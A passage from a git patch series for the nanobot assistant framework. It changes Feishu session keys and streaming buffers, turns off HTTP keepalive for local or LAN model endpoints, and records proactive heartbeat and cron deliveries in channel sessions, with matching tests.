test_on_background_task_done_removes_from_set() -> None: + """_on_background_task_done removes task from tracking set.""" + channel = _make_feishu_channel() + loop = asyncio.new_event_loop() + try: + async def _fail(): + raise RuntimeError("test failure") + + task = loop.create_task(_fail()) + channel._background_tasks.add(task) + try: + loop.run_until_complete(task) + except RuntimeError: + pass # expected + channel._on_background_task_done(task) + finally: + loop.close() + + assert task not in channel._background_tasks From 3eb8838dd9eacc3311a1d1cbc6926d938afa801f Mon Sep 17 00:00:00 2001 From: chengyongru <2755839590@qq.com> Date: Sun, 19 Apr 2026 23:02:39 +0800 Subject: [PATCH 08/25] fix(test): update reaction cleanup test for _reaction_ids dict The stream-end reaction cleanup now reads from _reaction_ids instead of metadata, so pre-populate the dict in the test instead of passing reaction_id via metadata. --- tests/channels/test_feishu_reaction.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/tests/channels/test_feishu_reaction.py b/tests/channels/test_feishu_reaction.py index 479e3dc98..b775dd3e1 100644 --- a/tests/channels/test_feishu_reaction.py +++ b/tests/channels/test_feishu_reaction.py @@ -166,13 +166,14 @@ class TestStreamEndReactionCleanup: ch._stream_bufs["oc_chat1"] = _FeishuStreamBuf( text="Done", card_id="card_1", sequence=3, last_edit=0.0, ) + ch._reaction_ids["om_001"] = "rx_42" ch._client.cardkit.v1.card_element.content.return_value = MagicMock(success=MagicMock(return_value=True)) ch._client.cardkit.v1.card.settings.return_value = MagicMock(success=MagicMock(return_value=True)) ch._remove_reaction = AsyncMock() await ch.send_delta( "oc_chat1", "", - metadata={"_stream_end": True, "message_id": "om_001", "reaction_id": "rx_42"}, + metadata={"_stream_end": True, "message_id": "om_001"}, ) ch._remove_reaction.assert_called_once_with("om_001", "rx_42") From 0e92936cf3e1fbfa431b8f9590b957be01fac7aa Mon Sep 17 00:00:00 2001 From: chengyongru <2755839590@qq.com> Date: Sun, 19 Apr 2026 23:09:20 +0800 Subject: [PATCH 09/25] chore(test): remove stale reaction_id from test metadata The production code no longer reads reaction_id from metadata, so remove the leftover key from the test_no_removal_when_message_id_missing test case. --- tests/channels/test_feishu_reaction.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/channels/test_feishu_reaction.py b/tests/channels/test_feishu_reaction.py index b775dd3e1..c09b0eb3b 100644 --- a/tests/channels/test_feishu_reaction.py +++ b/tests/channels/test_feishu_reaction.py @@ -190,7 +190,7 @@ class TestStreamEndReactionCleanup: await ch.send_delta( "oc_chat1", "", - metadata={"_stream_end": True, "reaction_id": "rx_42"}, + metadata={"_stream_end": True}, ) ch._remove_reaction.assert_not_called() From 39eea1b7625d002a363374d72c9df583519ed442 Mon Sep 17 00:00:00 2001 From: chengyongru <2755839590@qq.com> Date: Mon, 20 Apr 2026 00:07:25 +0800 Subject: [PATCH 10/25] feat(feishu): per-message session for group top-level messages Align with deer-flow: group top-level messages (no root_id) now get their own session keyed by message_id instead of sharing a single group-wide session. Topic replies continue to share session via root_id. --- nanobot/channels/feishu.py | 8 ++++---- tests/channels/test_feishu_reply.py | 7 +++---- 2 files changed, 7 insertions(+), 8 deletions(-) diff --git a/nanobot/channels/feishu.py b/nanobot/channels/feishu.py index 47daa7dff..c34a98678 100644 --- a/nanobot/channels/feishu.py +++ b/nanobot/channels/feishu.py @@ -1728,11 +1728,11 @@ class FeishuChannel(BaseChannel): return # Build topic-scoped session key for conversation isolation. - # Group chat: thread replies (root_id != message_id) get a scoped - # session so each Feishu thread has its own conversation context. + # Group chat: each topic gets its own session via root_id (replies + # inside a topic) or message_id (top-level messages start a new topic). # Private chat: no override — same behavior as Telegram/Slack. - if chat_type == "group" and root_id and root_id != message_id: - session_key = f"feishu:{chat_id}:{root_id}" + if chat_type == "group": + session_key = f"feishu:{chat_id}:{root_id or message_id}" else: session_key = None diff --git a/tests/channels/test_feishu_reply.py b/tests/channels/test_feishu_reply.py index 24003810a..1b72f14c9 100644 --- a/tests/channels/test_feishu_reply.py +++ b/tests/channels/test_feishu_reply.py @@ -480,8 +480,8 @@ async def test_session_key_group_with_root_id_is_thread_scoped() -> None: @pytest.mark.asyncio -async def test_session_key_group_no_root_id_uses_default() -> None: - """Group message without root_id uses default session key (no override).""" +async def test_session_key_group_no_root_id_uses_message_id() -> None: + """Group message without root_id gets session keyed by message_id (per-message session).""" channel = _make_feishu_channel(group_policy="open") bus_spy = [] original_publish = channel.bus.publish_inbound @@ -504,8 +504,7 @@ async def test_session_key_group_no_root_id_uses_default() -> None: await channel._on_message(event) assert len(bus_spy) == 1 - assert bus_spy[0].session_key_override is None - assert bus_spy[0].session_key == "feishu:oc_abc" + assert bus_spy[0].session_key == "feishu:oc_abc:om_001" @pytest.mark.asyncio From d0e1b1393a562d19cfe2e5c004da507da451db8b Mon Sep 17 00:00:00 2001 From: Xubin Ren Date: Sun, 26 Apr 2026 08:07:30 +0000 Subject: [PATCH 11/25] fix(feishu): scope streaming buffers by message Keep concurrent Feishu group replies from sharing one streaming card buffer when sessions are split by topic or top-level message. Made-with: Cursor --- nanobot/channels/feishu.py | 18 ++++++++++++------ tests/channels/test_feishu_reaction.py | 20 +++++++++++++++++++- tests/channels/test_feishu_reply.py | 1 - 3 files changed, 31 insertions(+), 8 deletions(-) diff --git a/nanobot/channels/feishu.py b/nanobot/channels/feishu.py index c34a98678..57260e906 100644 --- a/nanobot/channels/feishu.py +++ b/nanobot/channels/feishu.py @@ -13,6 +13,7 @@ from dataclasses import dataclass from typing import Any, Literal from lark_oapi.api.im.v1.model import MentionEvent, P2ImMessageReceiveV1 +from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN from loguru import logger from pydantic import Field @@ -22,8 +23,6 @@ from nanobot.channels.base import BaseChannel from nanobot.config.paths import get_media_dir from nanobot.config.schema import Base -from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN - FEISHU_AVAILABLE = importlib.util.find_spec("lark_oapi") is not None # Message type display mapping @@ -623,6 +622,12 @@ class FeishuChannel(BaseChannel): if len(self._reaction_ids) > 500: self._reaction_ids.pop(next(iter(self._reaction_ids))) + @staticmethod + def _stream_key(chat_id: str, metadata: dict[str, Any] | None = None) -> str: + """Scope streaming buffers to the inbound message when available.""" + meta = metadata or {} + return meta.get("message_id") or chat_id + # Regex to match markdown tables (header + separator + data rows) _TABLE_RE = re.compile( r"((?:^[ \t]*\|.+\|[ \t]*\n)(?:^[ \t]*\|[-:\s|]+\|[ \t]*\n)(?:^[ \t]*\|.+\|[ \t]*\n?)+)", @@ -1349,6 +1354,7 @@ class FeishuChannel(BaseChannel): if not self._client: return meta = metadata or {} + stream_key = self._stream_key(chat_id, meta) loop = asyncio.get_running_loop() rid_type = "chat_id" if chat_id.startswith("oc_") else "open_id" @@ -1363,7 +1369,7 @@ class FeishuChannel(BaseChannel): if self.config.done_emoji: await self._add_reaction(message_id, self.config.done_emoji) - buf = self._stream_bufs.pop(chat_id, None) + buf = self._stream_bufs.pop(stream_key, None) if not buf or not buf.text: return # Try to finalize via streaming card; if that fails (e.g. @@ -1417,10 +1423,10 @@ class FeishuChannel(BaseChannel): return # --- accumulate delta --- - buf = self._stream_bufs.get(chat_id) + buf = self._stream_bufs.get(stream_key) if buf is None: buf = _FeishuStreamBuf() - self._stream_bufs[chat_id] = buf + self._stream_bufs[stream_key] = buf buf.text += delta if not buf.text.strip(): return @@ -1469,7 +1475,7 @@ class FeishuChannel(BaseChannel): hint = (msg.content or "").strip() if not hint: return - buf = self._stream_bufs.get(msg.chat_id) + buf = self._stream_bufs.get(self._stream_key(msg.chat_id, msg.metadata)) if buf and buf.card_id: # Delegate to send_delta so tool hints get the same # throttling (and card creation) as regular text deltas. diff --git a/tests/channels/test_feishu_reaction.py b/tests/channels/test_feishu_reaction.py index c09b0eb3b..68229e267 100644 --- a/tests/channels/test_feishu_reaction.py +++ b/tests/channels/test_feishu_reaction.py @@ -1,6 +1,6 @@ """Tests for Feishu reaction add/remove and auto-cleanup on stream end.""" from types import SimpleNamespace -from unittest.mock import AsyncMock, MagicMock, patch +from unittest.mock import AsyncMock, MagicMock import pytest @@ -160,6 +160,24 @@ class TestRemoveReactionAsync: class TestStreamEndReactionCleanup: + @pytest.mark.asyncio + async def test_stream_buffers_are_scoped_by_message_id(self): + ch = _make_channel() + ch._create_streaming_card_sync = MagicMock(return_value=None) + + await ch.send_delta( + "oc_chat1", "first", + metadata={"message_id": "om_first"}, + ) + await ch.send_delta( + "oc_chat1", "second", + metadata={"message_id": "om_second"}, + ) + + assert ch._stream_bufs["om_first"].text == "first" + assert ch._stream_bufs["om_second"].text == "second" + assert "oc_chat1" not in ch._stream_bufs + @pytest.mark.asyncio async def test_removes_reaction_on_stream_end(self): ch = _make_channel() diff --git a/tests/channels/test_feishu_reply.py b/tests/channels/test_feishu_reply.py index 1b72f14c9..f7dc39e5d 100644 --- a/tests/channels/test_feishu_reply.py +++ b/tests/channels/test_feishu_reply.py @@ -21,7 +21,6 @@ from nanobot.bus.events import OutboundMessage from nanobot.bus.queue import MessageBus from nanobot.channels.feishu import FeishuChannel, FeishuConfig - # --------------------------------------------------------------------------- # Helpers # --------------------------------------------------------------------------- From 5943ab386d8a47e29eea89baf6c6098762020505 Mon Sep 17 00:00:00 2001 From: hussein1362 Date: Sat, 25 Apr 2026 17:36:58 +0300 Subject: [PATCH 12/25] fix(providers): disable HTTP keepalive for local/LAN endpoints MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Local model servers (Ollama, llama.cpp, vLLM) often close idle HTTP connections before the client-side keepalive timer expires. When two LLM calls happen seconds apart — for example the heartbeat _decide() phase followed immediately by process_direct() — the second call grabs a now-dead pooled connection, causing a transient APIConnectionError on every first attempt. The fix detects local endpoints via: - ProviderSpec.is_local (Ollama, LM Studio, vLLM, OVMS) - Private-network URL patterns (localhost, 127.x, 192.168.x, 10.x, 172.16-31.x, host.docker.internal, [::1]) For these endpoints, the AsyncOpenAI client is created with a custom httpx.AsyncClient that sets keepalive_expiry=0, forcing a fresh TCP connection for each request. This is cheap on LAN (sub-5ms connect) and eliminates the stale-connection retry tax entirely. Cloud providers (OpenAI, Anthropic, OpenRouter, etc.) keep the default 5-second keepalive, which is fine for high-frequency API usage. The private-network heuristic also covers the common case where users configure provider='openai' but point apiBase at a LAN IP running llama.cpp — the spec says is_local=False, but the URL clearly is. --- nanobot/providers/openai_compat_provider.py | 50 ++++++++ .../test_local_endpoint_detection.py | 111 ++++++++++++++++++ 2 files changed, 161 insertions(+) create mode 100644 tests/providers/test_local_endpoint_detection.py diff --git a/nanobot/providers/openai_compat_provider.py b/nanobot/providers/openai_compat_provider.py index f603b9e37..c59080abc 100644 --- a/nanobot/providers/openai_compat_provider.py +++ b/nanobot/providers/openai_compat_provider.py @@ -14,6 +14,7 @@ import uuid from collections.abc import Awaitable, Callable from typing import TYPE_CHECKING, Any +import httpx import json_repair from loguru import logger @@ -159,6 +160,39 @@ _RESPONSES_FAILURE_THRESHOLD = 3 _RESPONSES_PROBE_INTERVAL_S = 300 # 5 minutes +def _is_local_endpoint( + spec: "ProviderSpec | None", + api_base: str | None, +) -> bool: + """Return True when the endpoint is a local or LAN model server. + + Matches either the provider spec's ``is_local`` flag or common private- + network patterns in the base URL (localhost, 127.x, 192.168.x, 10.x, + 172.16-31.x, Docker ``host.docker.internal``). + """ + if spec and spec.is_local: + return True + if not api_base: + return False + host = api_base.strip().lower().rstrip("/") + private_patterns = ( + "localhost", + "127.", + "192.168.", + "10.", + "host.docker.internal", + "[::1]", + ) + if any(p in host for p in private_patterns): + return True + # 172.16.0.0 – 172.31.255.255 + import re + m = re.search(r"172\.(\d+)\." , host) + if m and 16 <= int(m.group(1)) <= 31: + return True + return False + + def _is_direct_openai_base(api_base: str | None) -> bool: """Return True for direct OpenAI endpoints, not generic OpenAI-compatible gateways.""" if not api_base: @@ -208,11 +242,27 @@ class OpenAICompatProvider(LLMProvider): if extra_headers: default_headers.update(extra_headers) + # Local model servers (Ollama, llama.cpp, vLLM) often close idle + # HTTP connections before the client-side keepalive expires. When + # two LLM calls happen seconds apart (e.g. heartbeat _decide then + # process_direct), the second call may grab a now-dead pooled + # connection, causing a transient APIConnectionError on every first + # attempt. Disabling keepalive for local endpoints avoids this by + # opening a fresh connection for each request, which is cheap on a + # LAN. Cloud providers benefit from keepalive, so we leave the + # default pool settings for them. + http_client: httpx.AsyncClient | None = None + if _is_local_endpoint(spec, effective_base): + http_client = httpx.AsyncClient( + limits=httpx.Limits(keepalive_expiry=0), + ) + self._client = AsyncOpenAI( api_key=api_key or "no-key", base_url=effective_base, default_headers=default_headers, max_retries=0, + http_client=http_client, ) # Responses API circuit breaker: skip after repeated failures, diff --git a/tests/providers/test_local_endpoint_detection.py b/tests/providers/test_local_endpoint_detection.py new file mode 100644 index 000000000..2b27176be --- /dev/null +++ b/tests/providers/test_local_endpoint_detection.py @@ -0,0 +1,111 @@ +"""Tests for _is_local_endpoint detection and keepalive configuration.""" + +from unittest.mock import MagicMock + +import pytest + +from nanobot.providers.openai_compat_provider import ( + OpenAICompatProvider, + _is_local_endpoint, +) + + +def _make_spec(is_local: bool = False) -> MagicMock: + spec = MagicMock() + spec.is_local = is_local + return spec + + +class TestIsLocalEndpoint: + """Test the _is_local_endpoint helper.""" + + def test_spec_is_local_true(self): + assert _is_local_endpoint(_make_spec(is_local=True), None) is True + + def test_spec_is_local_false_no_base(self): + assert _is_local_endpoint(_make_spec(is_local=False), None) is False + + def test_no_spec_no_base(self): + assert _is_local_endpoint(None, None) is False + + def test_localhost(self): + assert _is_local_endpoint(None, "http://localhost:1234/v1") is True + + def test_localhost_https(self): + assert _is_local_endpoint(None, "https://localhost:8080/v1") is True + + def test_loopback_127(self): + assert _is_local_endpoint(None, "http://127.0.0.1:11434/v1") is True + + def test_private_192_168(self): + assert _is_local_endpoint(None, "http://192.168.8.188:1234/v1") is True + + def test_private_10(self): + assert _is_local_endpoint(None, "http://10.0.0.5:8000/v1") is True + + def test_private_172_16(self): + assert _is_local_endpoint(None, "http://172.16.0.1:1234/v1") is True + + def test_private_172_31(self): + assert _is_local_endpoint(None, "http://172.31.255.255:1234/v1") is True + + def test_not_private_172_32(self): + assert _is_local_endpoint(None, "http://172.32.0.1:1234/v1") is False + + def test_docker_internal(self): + assert _is_local_endpoint(None, "http://host.docker.internal:11434/v1") is True + + def test_ipv6_loopback(self): + assert _is_local_endpoint(None, "http://[::1]:1234/v1") is True + + def test_public_api(self): + assert _is_local_endpoint(None, "https://api.openai.com/v1") is False + + def test_openrouter(self): + assert _is_local_endpoint(None, "https://openrouter.ai/api/v1") is False + + def test_spec_overrides_public_url(self): + """spec.is_local=True takes precedence even with a public-looking URL.""" + assert _is_local_endpoint(_make_spec(is_local=True), "https://api.example.com/v1") is True + + def test_case_insensitive(self): + assert _is_local_endpoint(None, "http://LOCALHOST:1234/v1") is True + + def test_trailing_slash(self): + assert _is_local_endpoint(None, "http://192.168.1.1:8080/v1/") is True + + +class TestLocalKeepaliveConfig: + """Verify that local endpoints get keepalive_expiry=0.""" + + def test_local_spec_disables_keepalive(self): + spec = _make_spec(is_local=True) + spec.env_key = "" + spec.default_api_base = "http://localhost:11434/v1" + provider = OpenAICompatProvider( + api_key="test", api_base="http://localhost:11434/v1", spec=spec, + ) + pool = provider._client._client._transport._pool + assert pool._keepalive_expiry == 0 + + def test_lan_ip_disables_keepalive(self): + """A generic 'openai' spec with a LAN IP should still disable keepalive.""" + spec = _make_spec(is_local=False) + spec.env_key = "" + spec.default_api_base = None + provider = OpenAICompatProvider( + api_key="test", api_base="http://192.168.8.188:1234/v1", spec=spec, + ) + pool = provider._client._client._transport._pool + assert pool._keepalive_expiry == 0 + + def test_cloud_keeps_default_keepalive(self): + spec = _make_spec(is_local=False) + spec.env_key = "" + spec.default_api_base = "https://api.openai.com/v1" + provider = OpenAICompatProvider( + api_key="test", api_base=None, spec=spec, + ) + pool = provider._client._client._transport._pool + # Default httpx keepalive is 5.0s + assert pool._keepalive_expiry == 5.0 From 1e11b35b451fdf1a0dc8c15a71179f62707bbb06 Mon Sep 17 00:00:00 2001 From: Xubin Ren Date: Sun, 26 Apr 2026 08:12:37 +0000 Subject: [PATCH 13/25] fix(providers): tighten local endpoint detection Parse the endpoint host before disabling keepalive so public hostnames that merely contain private-network substrings keep the default connection pool behavior. Made-with: Cursor --- nanobot/providers/openai_compat_provider.py | 34 +++++++++---------- .../test_local_endpoint_detection.py | 11 ++++-- 2 files changed, 26 insertions(+), 19 deletions(-) diff --git a/nanobot/providers/openai_compat_provider.py b/nanobot/providers/openai_compat_provider.py index c59080abc..ef255cf23 100644 --- a/nanobot/providers/openai_compat_provider.py +++ b/nanobot/providers/openai_compat_provider.py @@ -3,16 +3,18 @@ from __future__ import annotations import asyncio -import json import hashlib import importlib.util +import json import os import secrets import string import time import uuid from collections.abc import Awaitable, Callable +from ipaddress import ip_address from typing import TYPE_CHECKING, Any +from urllib.parse import urlparse import httpx import json_repair @@ -174,23 +176,21 @@ def _is_local_endpoint( return True if not api_base: return False - host = api_base.strip().lower().rstrip("/") - private_patterns = ( - "localhost", - "127.", - "192.168.", - "10.", - "host.docker.internal", - "[::1]", - ) - if any(p in host for p in private_patterns): + raw = api_base.strip().lower() + parsed = urlparse(raw if "://" in raw else f"//{raw}") + try: + host = parsed.hostname + except ValueError: + return False + if host in {"localhost", "host.docker.internal"}: return True - # 172.16.0.0 – 172.31.255.255 - import re - m = re.search(r"172\.(\d+)\." , host) - if m and 16 <= int(m.group(1)) <= 31: - return True - return False + if not host: + return False + try: + addr = ip_address(host) + except ValueError: + return False + return addr.is_loopback or addr.is_private def _is_direct_openai_base(api_base: str | None) -> bool: diff --git a/tests/providers/test_local_endpoint_detection.py b/tests/providers/test_local_endpoint_detection.py index 2b27176be..fe45b90aa 100644 --- a/tests/providers/test_local_endpoint_detection.py +++ b/tests/providers/test_local_endpoint_detection.py @@ -2,8 +2,6 @@ from unittest.mock import MagicMock -import pytest - from nanobot.providers.openai_compat_provider import ( OpenAICompatProvider, _is_local_endpoint, @@ -74,6 +72,15 @@ class TestIsLocalEndpoint: def test_trailing_slash(self): assert _is_local_endpoint(None, "http://192.168.1.1:8080/v1/") is True + def test_public_hostname_containing_localhost_is_not_local(self): + assert _is_local_endpoint(None, "https://notlocalhost.example/v1") is False + + def test_public_hostname_containing_private_ip_prefix_is_not_local(self): + assert _is_local_endpoint(None, "https://api10.example.com/v1") is False + + def test_url_without_scheme(self): + assert _is_local_endpoint(None, "192.168.1.1:8080/v1") is True + class TestLocalKeepaliveConfig: """Verify that local endpoints get keepalive_expiry=0.""" From 15726261003f3def18189a5adc98f464bf052d78 Mon Sep 17 00:00:00 2001 From: hussein1362 Date: Wed, 22 Apr 2026 15:07:43 +0300 Subject: [PATCH 14/25] fix(heartbeat): inject delivered messages into channel session for reply continuity MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit When heartbeat delivers output to a channel (e.g. Telegram), the message is a raw OutboundMessage that bypasses the channel's session. If the user replies, their reply enters a different session with no context about the heartbeat message, so the agent cannot follow through. This change injects the delivered heartbeat message as an assistant turn into the target channel's session before publishing the outbound. When the user replies, the channel session has conversational context. Handles unified_session mode by resolving to UNIFIED_SESSION_KEY when enabled, matching the agent loop's own session routing. No changes to agent/loop.py, session/manager.py, channels, providers, or config schema — uses existing add_message() and save() APIs. --- nanobot/cli/commands.py | 22 +++- .../test_heartbeat_context_bridge.py | 102 ++++++++++++++++++ 2 files changed, 123 insertions(+), 1 deletion(-) create mode 100644 tests/heartbeat/test_heartbeat_context_bridge.py diff --git a/nanobot/cli/commands.py b/nanobot/cli/commands.py index c4cd2b1b4..27a7f6ecb 100644 --- a/nanobot/cli/commands.py +++ b/nanobot/cli/commands.py @@ -812,11 +812,31 @@ def _run_gateway( return resp.content if resp else "" async def on_heartbeat_notify(response: str) -> None: - """Deliver a heartbeat response to the user's channel.""" + """Deliver a heartbeat response to the user's channel. + + In addition to publishing the outbound message, this injects the + delivered text as an assistant turn into the *target channel's* + session. Without this, a user reply on the channel (e.g. "Sure") + lands in a session that has no context about the heartbeat message + and the agent cannot follow through. + """ from nanobot.bus.events import OutboundMessage channel, chat_id = _pick_heartbeat_target() if channel == "cli": return # No external channel available to deliver to + + # Inject the delivered message into the channel session so that + # user replies have conversational context. + from nanobot.agent.loop import UNIFIED_SESSION_KEY + target_key = ( + UNIFIED_SESSION_KEY + if config.agents.defaults.unified_session + else f"{channel}:{chat_id}" + ) + target_session = agent.sessions.get_or_create(target_key) + target_session.add_message("assistant", response) + agent.sessions.save(target_session) + await bus.publish_outbound(OutboundMessage(channel=channel, chat_id=chat_id, content=response)) hb_cfg = config.gateway.heartbeat diff --git a/tests/heartbeat/test_heartbeat_context_bridge.py b/tests/heartbeat/test_heartbeat_context_bridge.py new file mode 100644 index 000000000..ced2ddddc --- /dev/null +++ b/tests/heartbeat/test_heartbeat_context_bridge.py @@ -0,0 +1,102 @@ +"""Tests for heartbeat context bridge — injecting delivered messages into channel session.""" + +from nanobot.session.manager import SessionManager + + +class TestHeartbeatContextBridge: + """Verify that on_heartbeat_notify injects the assistant message into the + channel session so user replies have conversational context.""" + + def test_notify_injects_into_channel_session(self, tmp_path): + """After notify, the target channel session should contain the + heartbeat response as an assistant turn.""" + session_mgr = SessionManager(tmp_path / "sessions") + target_key = "telegram:12345" + + # Simulate: session exists with one user message + target_session = session_mgr.get_or_create(target_key) + target_session.add_message("user", "hello earlier") + session_mgr.save(target_session) + + # Simulate what on_heartbeat_notify does + target_session = session_mgr.get_or_create(target_key) + target_session.add_message("assistant", "3 new emails — invoice, meeting, proposal.") + session_mgr.save(target_session) + + # Reload and verify + reloaded = session_mgr.get_or_create(target_key) + messages = reloaded.get_history(max_messages=0) + roles = [m["role"] for m in messages] + assert roles == ["user", "assistant"] + assert "3 new emails" in messages[-1]["content"] + + def test_reply_after_injection_has_context(self, tmp_path): + """Simulates the full flow: prior conversation exists, heartbeat + injects, then user replies. The session should have the heartbeat + message visible in get_history so the model sees the context.""" + session_mgr = SessionManager(tmp_path / "sessions") + target_key = "telegram:12345" + + # Pre-existing conversation (user has chatted before) + session = session_mgr.get_or_create(target_key) + session.add_message("user", "Hey") + session.add_message("assistant", "Hi there!") + session_mgr.save(session) + + # Step 1: heartbeat injects assistant message + session = session_mgr.get_or_create(target_key) + session.add_message("assistant", "If you want, I can mark that email as read.") + session_mgr.save(session) + + # Step 2: user replies "Sure" + session = session_mgr.get_or_create(target_key) + session.add_message("user", "Sure") + session_mgr.save(session) + + # Verify: get_history includes the heartbeat injection + reloaded = session_mgr.get_or_create(target_key) + history = reloaded.get_history(max_messages=0) + roles = [m["role"] for m in history] + assert roles == ["user", "assistant", "assistant", "user"] + assert "mark that email" in history[2]["content"] + assert history[3]["content"] == "Sure" + + def test_injection_does_not_duplicate_on_existing_history(self, tmp_path): + """If the channel session already has messages, the injection + appends cleanly without corruption.""" + session_mgr = SessionManager(tmp_path / "sessions") + target_key = "telegram:12345" + + # Pre-existing conversation + session = session_mgr.get_or_create(target_key) + session.add_message("user", "What time is it?") + session.add_message("assistant", "It's 2pm.") + session.add_message("user", "Thanks") + session_mgr.save(session) + + # Heartbeat injects + session = session_mgr.get_or_create(target_key) + session.add_message("assistant", "You have a meeting in 30 minutes.") + session_mgr.save(session) + + # Verify + reloaded = session_mgr.get_or_create(target_key) + history = reloaded.get_history(max_messages=0) + roles = [m["role"] for m in history] + assert roles == ["user", "assistant", "user", "assistant"] + assert "meeting in 30 minutes" in history[-1]["content"] + + def test_injection_to_empty_session(self, tmp_path): + """Injecting into a brand-new session (no prior messages) works.""" + session_mgr = SessionManager(tmp_path / "sessions") + target_key = "telegram:99999" + + session = session_mgr.get_or_create(target_key) + session.add_message("assistant", "Weather alert: sandstorm expected at 4pm.") + session_mgr.save(session) + + reloaded = session_mgr.get_or_create(target_key) + history = reloaded.get_history(max_messages=0) + assert len(history) == 1 + assert history[0]["role"] == "assistant" + assert "sandstorm" in history[0]["content"] From 799db3351783d43b4048d845af83b1b7b8b4e6fc Mon Sep 17 00:00:00 2001 From: Xubin Ren Date: Sun, 26 Apr 2026 11:46:30 +0000 Subject: [PATCH 15/25] fix(heartbeat): record proactive deliveries in channel sessions Route heartbeat, cron, and message-tool deliveries through one gateway helper so user-visible proactive messages are available when the channel replies. Made-with: Cursor --- nanobot/cli/commands.py | 60 ++++++++++++------- nanobot/session/manager.py | 8 ++- tests/cli/test_commands.py | 32 +++++++++- .../test_heartbeat_context_bridge.py | 32 +++++++--- 4 files changed, 100 insertions(+), 32 deletions(-) diff --git a/nanobot/cli/commands.py b/nanobot/cli/commands.py index 27a7f6ecb..684e7f4c4 100644 --- a/nanobot/cli/commands.py +++ b/nanobot/cli/commands.py @@ -656,6 +656,8 @@ def _run_gateway( ) -> None: """Shared gateway runtime; ``open_browser_url`` opens a tab once channels are up.""" from nanobot.agent.loop import AgentLoop + from nanobot.agent.tools.cron import CronTool + from nanobot.agent.tools.message import MessageTool from nanobot.bus.queue import MessageBus from nanobot.channels.manager import ChannelManager from nanobot.cron.service import CronService @@ -704,6 +706,34 @@ def _run_gateway( tools_config=config.tools, ) + from nanobot.agent.loop import UNIFIED_SESSION_KEY + from nanobot.bus.events import OutboundMessage + + def _channel_session_key(channel: str, chat_id: str) -> str: + return ( + UNIFIED_SESSION_KEY + if config.agents.defaults.unified_session + else f"{channel}:{chat_id}" + ) + + async def _deliver_to_channel(msg: OutboundMessage, *, record: bool = True) -> None: + """Publish a user-visible message and mirror it into that channel's session.""" + if ( + record + and msg.channel != "cli" + and msg.content.strip() + and hasattr(session_manager, "get_or_create") + and hasattr(session_manager, "save") + ): + session = session_manager.get_or_create(_channel_session_key(msg.channel, msg.chat_id)) + session.add_message("assistant", msg.content, _channel_delivery=True) + session_manager.save(session) + await bus.publish_outbound(msg) + + message_tool = getattr(agent, "tools", {}).get("message") + if isinstance(message_tool, MessageTool): + message_tool.set_send_callback(_deliver_to_channel) + # Set cron callback (needs agent) async def on_cron_job(job: CronJob) -> str | None: """Execute a cron job through the agent.""" @@ -716,8 +746,6 @@ def _run_gateway( logger.exception("Dream cron job failed") return None - from nanobot.agent.tools.cron import CronTool - from nanobot.agent.tools.message import MessageTool from nanobot.utils.evaluator import evaluate_response reminder_note = ( @@ -757,12 +785,13 @@ def _run_gateway( response, reminder_note, provider, agent.model, ) if should_notify: - from nanobot.bus.events import OutboundMessage - await bus.publish_outbound(OutboundMessage( - channel=job.payload.channel or "cli", - chat_id=job.payload.to, - content=response, - )) + await _deliver_to_channel( + OutboundMessage( + channel=job.payload.channel or "cli", + chat_id=job.payload.to, + content=response, + ) + ) return response cron.on_job = on_cron_job @@ -820,24 +849,11 @@ def _run_gateway( lands in a session that has no context about the heartbeat message and the agent cannot follow through. """ - from nanobot.bus.events import OutboundMessage channel, chat_id = _pick_heartbeat_target() if channel == "cli": return # No external channel available to deliver to - # Inject the delivered message into the channel session so that - # user replies have conversational context. - from nanobot.agent.loop import UNIFIED_SESSION_KEY - target_key = ( - UNIFIED_SESSION_KEY - if config.agents.defaults.unified_session - else f"{channel}:{chat_id}" - ) - target_session = agent.sessions.get_or_create(target_key) - target_session.add_message("assistant", response) - agent.sessions.save(target_session) - - await bus.publish_outbound(OutboundMessage(channel=channel, chat_id=chat_id, content=response)) + await _deliver_to_channel(OutboundMessage(channel=channel, chat_id=chat_id, content=response)) hb_cfg = config.gateway.heartbeat heartbeat = HeartbeatService( diff --git a/nanobot/session/manager.py b/nanobot/session/manager.py index 69509a839..ddcfdea14 100644 --- a/nanobot/session/manager.py +++ b/nanobot/session/manager.py @@ -46,10 +46,14 @@ class Session: unconsolidated = self.messages[self.last_consolidated:] sliced = unconsolidated[-max_messages:] - # Avoid starting mid-turn when possible. + # Avoid starting mid-turn when possible, except for proactive + # assistant deliveries that the user may be replying to. for i, message in enumerate(sliced): if message.get("role") == "user": - sliced = sliced[i:] + start = i + if i > 0 and sliced[i - 1].get("_channel_delivery"): + start = i - 1 + sliced = sliced[start:] break # Drop orphan tool results at the front. diff --git a/tests/cli/test_commands.py b/tests/cli/test_commands.py index 2719beed1..403f53fb3 100644 --- a/tests/cli/test_commands.py +++ b/tests/cli/test_commands.py @@ -942,7 +942,27 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context( monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None) monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: provider) monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus) - monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object()) + + class _FakeSession: + def __init__(self) -> None: + self.messages = [] + + def add_message(self, role: str, content: str, **kwargs) -> None: + self.messages.append({"role": role, "content": content, **kwargs}) + + class _FakeSessionManager: + def __init__(self, _workspace: Path) -> None: + self.session = _FakeSession() + seen["session_manager"] = self + + def get_or_create(self, key: str) -> _FakeSession: + seen["session_key"] = key + return self.session + + def save(self, session: _FakeSession) -> None: + seen["saved_session"] = session + + monkeypatch.setattr("nanobot.session.manager.SessionManager", _FakeSessionManager) class _FakeCron: def __init__(self, _store_path: Path) -> None: @@ -1030,6 +1050,16 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context( content="Time to stretch.", ) ) + assert seen["session_key"] == "telegram:user-1" + saved_session = seen["saved_session"] + assert isinstance(saved_session, _FakeSession) + assert saved_session.messages == [ + { + "role": "assistant", + "content": "Time to stretch.", + "_channel_delivery": True, + } + ] def test_gateway_cron_job_suppresses_intermediate_progress( diff --git a/tests/heartbeat/test_heartbeat_context_bridge.py 